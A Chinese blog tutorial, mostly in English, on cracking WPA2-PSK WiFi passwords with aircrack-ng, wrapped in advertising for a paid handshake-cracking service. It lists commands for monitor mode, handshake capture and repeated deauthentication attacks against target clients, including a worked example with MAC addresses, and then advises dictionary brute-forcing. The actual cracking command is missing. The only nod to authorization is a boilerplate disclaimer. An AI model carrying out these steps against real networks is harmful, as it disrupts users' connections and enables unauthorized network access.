用最朴素的方法进行WiFi无线渗透

caocao1年前教程187

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

WPA/WPA2:WPA/WPA2 is an encryption algorithm that is stronger than WEP. By selecting this security type, the router will use a Radius server for authentication and obtain the key in the form of WPA or WPA2. Since setting up a dedicated authentication server is costly and complex, it is not recommended for different users to use this security type.

WPA-PSK/WPA2-PSK: WPA-PSK/WPA2-PSK is actually a simplified version of WPA/WPA2, based on the shared key WPA format. It has high security and relatively simple settings, suitable for home users and small businesses.

Detailed settings include:

Authentication Type: This option is used to select the security format used by the system, namely Enterprise, WPA-PSK, or WPA2-PSK.

Enterprise: If this option is selected, the router will automatically choose between WPA-PSK or WPA2-PSK security format based on the client's request.

Encryption Algorithm: This option is used to select the security algorithm for encrypting wireless data. The options include Enterprise, TKIP, and AES. The default option is Enterprise. If this option is selected, the router will automatically choose between TKIP or AES encryption method based on practical needs. Note that 11N mode does not support TKIP algorithm.

PSK Passphrase: This is the initial key for WPA-PSK/WPA2-PSK. During setup, it requires 8-63 ASCII characters or 8-64 hexadecimal characters.

Group Key Update Period: This setting determines the timing for updating broadcast and group key, in seconds. The minimum value is 30. If the value is set to 0, it means no update will be performed.

Using Aircrack-ng to capture WPA2-PSK handshake packets:

Main steps:

  1. Set the wireless card to monitor mode: airmon-ng start wlan0

  2. Scan for nearby WPA2-PSK encrypted wireless signals: airodump-ng wlan0mon

  3. Open a new terminal and capture the handshake packets: airodump-ng -c [num] -w wpa2 wlan0mon (Specify the channel)

  4. During the waiting process, initiate a DeAuth attack to force the client to disconnect and reconnect, capturing the handshake packets: aireplay-ng -0 5 -a BSSID -c STATION wlan0mon (Set to initiate 5 attacks)

To continuously launch attacks, use this command: aireplay-ng -0 0 -a BSSID -c STATION wlan0mon

Start the operation. I am using the TL-WN722N network card. Now, I need to connect the virtual machine to the network card. After successful connection, when I enter ifconfig, I can see the information. Then, I enter airmon-ng start wlan0 to start monitoring.

During the process, CN represents the channel. Use the command airodump-ng -c channel --bssid xxx -w save_path wlan0mon to scan and capture the target's handshake packets.

Parameters: --ivs -w FAN (save packets in IVS format, name it as "test"), --bssid (SSID of the AP to be cracked).

Force the client to disconnect: aireplay-ng -0 0 -a target_MAC -c target_client_MAC wlan0mon

For example: aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon

Start the attack. Sometimes this command may give an error because the network card randomly uses channels. Try the same command multiple times until it succeeds.

If the handshake packet is captured successfully, it will be shown as in the figure.

Start cracking the password by executing the following command.

Finally, use a good dictionary for brute-forcing. After successful cracking, you will see the password. If the password is complex, it may take some time.

Disclaimer: The content shared on this public account is only for technical discussions among cybersecurity enthusiasts. It is prohibited to use it for illegal purposes. All penetration testing must be authorized. Otherwise, you will be responsible for the consequences. This public account and the original author do not bear any corresponding liability.

相关文章

Kali Linux恢复默认:一键还原系统设置 (kaili linux恢复默认

Kali Linux恢复默认:一键还原系统设置 (kaili linux恢复默认

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 Kali Linux是一...

如何安装使用渗透神器Kali手册中文版

如何安装使用渗透神器Kali手册中文版 本文主要讲解了如何安装和使用渗透测试工具Kali Linux,并提供了简单清晰的讲解内容,方便学习和理解。下面请跟随我的思路,一起深入研究和学习如何安装使用渗透...

无线安全专题_破解篇02--kali破解pin码

无线安全专题_破解篇02--kali破解pin码

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 最近项目有点紧,所以本应...

CDlinux_无线wifi wpa2密码破解软件 V0.9.7

CDlinux_无线wifi wpa2密码破解软件 V0.9.7

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 一般我们破解无线网都是用...